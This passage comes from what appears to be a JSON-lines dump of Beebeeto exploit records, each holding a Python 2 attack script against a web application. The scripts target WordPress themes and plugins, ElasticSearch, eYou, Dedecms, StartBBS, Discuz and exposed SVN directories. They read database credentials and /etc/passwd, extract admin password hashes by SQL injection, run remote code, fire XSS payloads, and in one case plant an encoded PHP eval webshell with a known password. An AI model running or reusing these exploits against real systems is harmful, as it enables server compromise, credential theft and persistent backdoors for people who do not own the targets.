urllib2.urlopen(req).read()\r\n if 'DB_USER' in response and 'DB_PASSWORD' in response and 'WordPress' in response:\r\n match_data1 = re.compile('\\'DB_USER\\'\\,(.*)\\)')\r\n match_data2 = re.compile('\\'DB_PASSWORD\\'\\,(.*)\\)')\r\n match_data3 = re.compile('\\'DB_HOST\\'\\,(.*)\\)')\r\n data1 = match_data1.findall(response)\r\n data2 = match_data2.findall(response)\r\n data3 = match_data3.findall(response)\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = args['options']['target'] + '/wp-content/themes/persuasion/lib/scripts/dl-skin.php'\r\n args['poc_ret']['DB_USER'] = data1[0]\r\n args['poc_ret']['DB_PASSWORD'] = data2[0]\r\n args['poc_ret']['DB_HOST'] = data3[0]\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "Wordpress Persuasion Theme 2.x \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d \uff0c\u901a\u8fc7\u6b64\u6f0f\u6d1e\u53ef\u4ee5\u4e0b\u8f7d\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u53ef\u8bfb\u6587\u4ef6\u3002", "app_name": "WordPress", "id": "poc-2014-0029", "layer4_protocol": 
null}
{"create_date": "2014-09-25 13:24:31", "name": "ElasticSearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "e3rp4y", "rank": 5, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "ElasticSearch,remote code execution,java", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\ntry:\r\n import simplejson as json\r\nexcept ImportError:\r\n import json\r\nimport socket\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import ForgeHeaders\r\n\r\nsocket.setdefaulttimeout(5)\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0028', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'ElasticSearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': 'e3rp4y', # \u4f5c\u8005\r\n 'create_date': '2014-09-25', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [9200], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ElasticSearch', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['<=1.2'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Code Execution', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['ElasticSearch', 'remote code execution', 'java'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'ElasticSearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e.', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': [\r\n 'http://www.ipuman.com/pm6/137/',\r\n 
'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3120',\r\n 'http://www.freebuf.com/tools/38025.html' # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def _emit(cls, args, exp):\r\n data = {\r\n 'size': 1,\r\n 'query': {\r\n 'filtered': {\r\n 'query': {\r\n 'match_all': {}\r\n }\r\n }\r\n },\r\n 'script_fields': {\r\n 'task': { # you can call the task any name, such as 'biubiubiu' etc.\r\n 'script': exp\r\n }\r\n }\r\n }\r\n payload = json.dumps(data)\r\n headers = ForgeHeaders().get_headers()\r\n headers['Content-Type'] = 'application/json; charset=utf-8'\r\n headers['Accept'] = 'ext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'\r\n url = args['options']['target'] + '/_search?source'\r\n req = urllib2.Request(url, data=payload, headers=headers)\r\n resp = urllib2.urlopen(req)\r\n if resp.getcode() != 200 or \\\r\n 'application/json' not in resp.headers.get('content-type'):\r\n return None\r\n else:\r\n ret = json.loads(resp.read())\r\n return ret['hits']['hits'][0]['fields']['task'][0]\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n rs = cls._emit(args, 'Integer.toHexString(65535)')\r\n if rs == 'ffff':\r\n url = args['options']['target'] + '/_search?source'\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = url\r\n if args['options']['verbose']:\r\n print '[*] {} is vulnerable'.format(args['options']['target'])\r\n else:\r\n if args['options']['verbose']:\r\n print '[*] {} is not vulnerable'.format(args['options']['target'])\r\n args['success'] = False\r\n\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "ElasticSearch \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e.", "app_name": "ElasticSearch", "id": "poc-2014-0028", "layer4_protocol": null}
{"create_date": "2014-09-24 19:54:25", "name": "SVN information disclosure POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "Eth0n", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "information disclosure,svn", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0024',\r\n 'name': 'SVN information disclosure POC',\r\n 'author': 'Eth0n',\r\n 'create_date': '2014-09-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'All site svn configuration wrong',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['information disclosure', 'svn'],\r\n 'desc': 'use svn incorrect cause site information disclosure',\r\n 'references': ['http://drops.wooyun.org/tips/352',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n keyword = ['file','dir']\r\n vul_url = args[\"options\"][\"target\"] + '/.svn/entries'\r\n if args['options']['verbose']:\r\n print \"[*] Request URL:\", vul_url\r\n resquest = urllib2.Request(vul_url)\r\n response = urllib2.urlopen(resquest)\r\n if response.getcode() != 200:\r\n args[\"success\"] = False\r\n return args\r\n content = response.read()\r\n flag = False\r\n for word in keyword:\r\n if word in content:\r\n flag = True\r\n break\r\n if flag == True:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = vul_url\r\n return args\r\n else:\r\n args[\"success\"] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n 
mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "use svn incorrect cause site information disclosure", "app_name": "SVN", "id": "poc-2014-0024", "layer4_protocol": null}
{"create_date": "2014-09-23 23:48:11", "name": "WordPress Acento Theme Arbitrary File Download POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "flsf", "rank": 2, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "WordPress,/wp-content/themes/acento/includes/view-pdf.php,Arbitrary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0022',\r\n 'name': 'WordPress Acento Theme Arbitrary File Download POC',\r\n 'author': 'flsf',\r\n 'create_date': '2014-09-23',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': [''],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['WordPress', '/wp-content/themes/acento/includes/view-pdf.php', 'Arbitrary File Download'],\r\n 'desc': 'wp\u4e3b\u9898\u63d2\u4ef6acento theme \u4e2dview-pad.php \u6587\u4ef6,\u53ef\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6',\r\n 'references': ['http://www.exploit-db.com/exploits/34578/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/etc/passwd\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n if 'root:' in content and 'nobody:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return 
args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "wp\u4e3b\u9898\u63d2\u4ef6acento theme \u4e2dview-pad.php \u6587\u4ef6,\u53ef\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6", "app_name": "WordPress", "id": "poc-2014-0022", "layer4_protocol": null}
{"create_date": "2014-09-23 17:13:43", "name": "eYou v5 /em/controller/action/help.class.php SQL Injection POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "root", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "eYou,sql injection", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport math\r\nimport time\r\nimport urllib2\r\nimport urllib\r\nimport hashlib, base64\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0021',# \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'eYou v5 /em/controller/action/help.class.php SQL Injection POC', # \u540d\u79f0\r\n 'author': 'root', # \u4f5c\u8005\r\n 'create_date': '2014-09-23', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'eYou', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['v5'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['eYou!', 'sql injection'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'eYou v5 has sql injection in /.', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-058014', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload_v = '\") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5(360213360213),NULL#'\r\n attack_url = 
args['options']['target'] + '/user/?q=help&type=search&page=1&kw='\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + attack_url + payload_v\r\n request = urllib2.Request(attack_url, payload_v)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n res= '5d975967029ada386ba2980a04b7720e'\r\n if res in content:\r\n args['success'] = True\r\n args['poc_ret']['key'] = res\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n payload = '\") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,(SELECT CONCAT(0x2d2d2d,IFNULL' \\\r\n '(CAST(admin_id AS CHAR),0x20),0x2d2d2d,IFNULL(CAST(admin_pass AS CHAR),0x20' \\\r\n '),0x2d2d2d) FROM filter.admininfo LIMIT 0,1),NULL#'\r\n match_data = re.compile('did=---(.*)---([\\w\\d]{32,32})---')\r\n attack_url = args['options']['target'] + '/user/?q=help&type=search&page=1&kw='\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + attack_url+ payload\r\n request = urllib2.Request(attack_url, payload)\r\n response = urllib2.urlopen(request).read()\r\n data = match_data.findall(response)\r\n if data:\r\n args['success'] = True\r\n args['poc_ret']['username'] = data[0][0]\r\n args['poc_ret']['password'] = data[0][1]\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "eYou v5 has sql injection in /.", "app_name": "eYou", "id": "poc-2014-0021", "layer4_protocol": null}
{"create_date": "2014-09-22 21:45:41", "name": "WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "xidianlz", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "WordPress,force-download.php,Arbitrary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n#coding:utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0017',\r\n 'name': 'WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability POC',\r\n 'author': 'xidianlz',\r\n 'create_date': '2014-09-22',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['1.1'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['WordPress', 'force-download.php', 'Arbitrary File Download'],\r\n 'desc': 'WordPress shortcode \u63d2\u4ef61.1\u7248\u672c\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e',\r\n 'references': ['http://sebug.net/vuldb/ssvid-87214',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/wp/wp-content/force-download.php?file=../wp-config.php\"\r\n vul_url = args[\"options\"][\"target\"] + payload\r\n if args['options']['verbose']:\r\n print \"[*] Request URL:\", vul_url\r\n resp = urllib2.urlopen(vul_url)\r\n content = resp.read()\r\n if (\"DB_PASSWORD\" in content ) and (\"DB_USER\" in content):\r\n args[\"success\"] = True\r\n args[\"poc_ret\"][\"vul_url\"] = vul_url\r\n return args\r\n else:\r\n args[\"success\"] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif 
__name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "WordPress shortcode \u63d2\u4ef61.1\u7248\u672c\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e", "app_name": "WordPress", "id": "poc-2014-0017", "layer4_protocol": null}
{"create_date": "2014-09-22 21:06:47", "name": "StartBBS /swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "hang333", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "StartBBS,Flash,XSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\" \r\nSite: http://www.beebeeto.com/ \r\nFramework: https://github.com/n0tr00t/Beebeeto-framework \r\n\"\"\" \r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0016',# \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'StartBBS /swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': 'hang333', # \u4f5c\u8005\r\n 'create_date': '2014-09-22', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'StartBBS', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['1.1.15.*'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'XSS', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['StartBBS', 'flash', 'xss'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'StartBBS 1.1.15.* /plugins/kindeditor/plugins/multiimage/images/swfupload.swf Flash XSS', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-049457/trace/bbf81ebe07bcc6021c3438868ae51051', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n } \r\n\r\n @classmethod \r\n def verify(cls, args): \r\n flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\" \r\n 
file_path = \"/plugins/kindeditor/plugins/multiimage/images/swfupload.swf\" \r\n verify_url = args['options']['target'] + file_path \r\n xss_poc = '?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//'\r\n if args['options']['verbose']: \r\n print '[*] Request URL: ' + verify_url \r\n request = urllib2.Request(verify_url) \r\n response = urllib2.urlopen(request) \r\n content = response.read() \r\n md5_value = md5.new(content).hexdigest() \r\n if md5_value in flash_md5: \r\n args['success'] = True \r\n args['poc_ret']['xss_url'] = verify_url + xss_poc\r\n return args \r\n else: \r\n args['success'] = False \r\n return args \r\n \r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "StartBBS 1.1.15.* /plugins/kindeditor/plugins/multiimage/images/swfupload.swf Flash XSS", "app_name": "Startbbs", "id": "poc-2014-0016", "layer4_protocol": null}
{"create_date": "2014-09-22 17:44:47", "name": "Dedecms 5.7 /download.php \u6ce8\u5165GETSHELL\u6f0f\u6d1e EXP", "level": "\u9ad8\u5371", "batchable": 1, "author": "HoerWing", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "dedecms,download.php&ad_js.php,SQL Inject,GETSHELL", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python \r\n# coding=utf-8 \r\n\r\n\"\"\" \r\nSite: http://www.beebeeto.com/ \r\nFramework: https://github.com/n0tr00t/Beebeeto-framework \r\n\"\"\"\r\n\r\nimport urllib2 \r\n \r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame): \r\n poc_info = { \r\n # poc\u76f8\u5173\u4fe1\u606f \r\n 'poc': { \r\n 'id': 'poc-2014-0015', \r\n 'name': 'dedecms 5.7 /download.php \u6ce8\u5165GETSHELL\u6f0f\u6d1e EXP', \r\n 'author': 'HoerWing', \r\n 'create_date': '2014-09-22', \r\n }, \r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f \r\n 'protocol': { \r\n 'name': 'http', \r\n 'port': [80], \r\n 'layer4_protocol': ['tcp'], \r\n }, \r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f \r\n 'vul': { \r\n 'app_name': 'dedecms', \r\n 'vul_version': ['5.7'], \r\n 'type': 'SQL Inject', \r\n 'tag': ['dedecms', 'download.php & ad_js.php', 'SQL Inject', 'GETSHELL'], \r\n 'desc': 'ExecuteNoneQuery2\u6267\u884cSql\u4f46\u662f\u6ca1\u6709\u8fdb\u884c\u9632\u6ce8\u5165\u5bfc\u81f4download.php\u6709sql\u6ce8\u5165\uff0c\u8fdb\u4e00\u6b65\u5bfc\u81f4\u5168\u5c40\u53d8\u91cf$GLOBALS\u53ef\u4ee5\u88ab\u4efb\u610f\u4fee\u6539', \r\n 'references': ['http://yxmhero1989.blog.163.com/blog/static/1121579562013581535738/', \r\n ], \r\n }, \r\n } \r\n \r\n @classmethod \r\n def exploit(cls, args): \r\n payload1 = 
\"/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=111&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35\" \r\n payload2 = \"/plus/ad_js.php?aid=19\"\r\n shell = \"/plus/moon.php\"\r\n keyword = \"mOon\"\r\n vul_url1 = args['options']['target'] + payload1 \r\n vul_url2 = args['options']['target'] + payload2\r\n shell_url = args['options']['target'] + shell\r\n if args['options']['verbose']: \r\n print '[*] Request URL: ' + vul_url1\r\n print '[*] Request URL: ' + vul_url2\r\n request1 = urllib2.urlopen(vul_url1)\r\n request2 = 
urllib2.urlopen(vul_url2)\r\n resp = urllib2.urlopen(shell_url) \r\n content = resp.read() \r\n if keyword in content: \r\n args['success'] = True \r\n args['poc_ret']['vul_url'] = vul_url2\r\n args['poc_ret']['shell'] = shell_url\r\n args['poc_ret']['password'] = 'x'\r\n return args \r\n else: \r\n args['success'] = False \r\n return args \r\n \r\n verify = exploit \r\n \r\nif __name__ == '__main__': \r\n from pprint import pprint \r\n \r\n mp = MyPoc() \r\n pprint(mp.run()) ", "desc": "ExecuteNoneQuery2\u6267\u884cSql\u4f46\u662f\u6ca1\u6709\u8fdb\u884c\u9632\u6ce8\u5165\u5bfc\u81f4download.php\u6709sql\u6ce8\u5165\uff0c\u8fdb\u4e00\u6b65\u5bfc\u81f4\u5168\u5c40\u53d8\u91cf$GLOBALS\u53ef\u4ee5\u88ab\u4efb\u610f\u4fee\u6539", "app_name": "DedeCms", "id": "poc-2014-0015", "layer4_protocol": null}
{"create_date": "2014-09-19 16:42:43", "name": "Discuz 7.2 /post.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "XSS,Discuz,post.php,Discuz7.2\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0009',\r\n 'name': 'Discuz 7.2 /post.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-09-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['7.2'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Discuz!', 'post.php', 'Cross Site Scripting', 'XSS'],\r\n 'desc': 'post.php\u4e2dhandlekey\u53d8\u91cf\u4f20\u5165global.func.php\u540e\u8fc7\u6ee4\u4e0d\u4e25,\u5bfc\u81f4\u53cd\u5c04XSS\u6f0f\u6d1e\u7684\u4ea7\u751f',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-065930',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/post.php?action=reply&fid=17&tid=1591&extra=&replysubmit=yes&infloat=yes&handlekey=,alert(/5294c4024a6f892da8a6af5abd1b3c36/)\"\r\n keyword = \"5294c4024a6f892da8a6af5abd1b3c36\"\r\n vul_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + vul_url\r\n print '[*] FileMD5 : ' + keyword\r\n request = urllib2.Request(vul_url)\r\n resp = urllib2.urlopen(request)\r\n content = resp.read()\r\n key = \"if(typeof 
